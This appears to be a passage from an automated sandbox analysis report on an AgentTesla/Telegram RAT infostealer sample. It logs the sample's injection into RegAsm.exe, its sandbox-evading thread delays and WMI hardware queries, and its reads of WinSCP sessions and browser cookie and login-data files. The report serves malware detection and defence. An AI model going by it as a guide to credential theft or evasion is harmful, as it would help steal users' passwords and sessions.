Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597446	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597011	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596794	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2573			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7255			Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe TID: 6344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199873s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199653s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199424s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199285s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -1199047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599846s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599723s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599518s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -599031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597577s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597446s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -597011s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596905s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596794s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6264	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe TID: 2056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe TID: 4128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\08(2)_00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199424	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199285	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599846	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599723	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599518	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597446	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597011	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596794	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegAsm.exe, 00000002.00000002.3874265033.0000000006342000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.3869447768.000000000310F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Users\user\Desktop\08(2)_00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Queries volume information: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Queries volume information: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.08(2)_00.exe.43f0218.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43c61e8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43f0218.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.43c61e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.08(2)_00.exe.435a978.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3868083116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1432692321.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3869447768.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3508, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
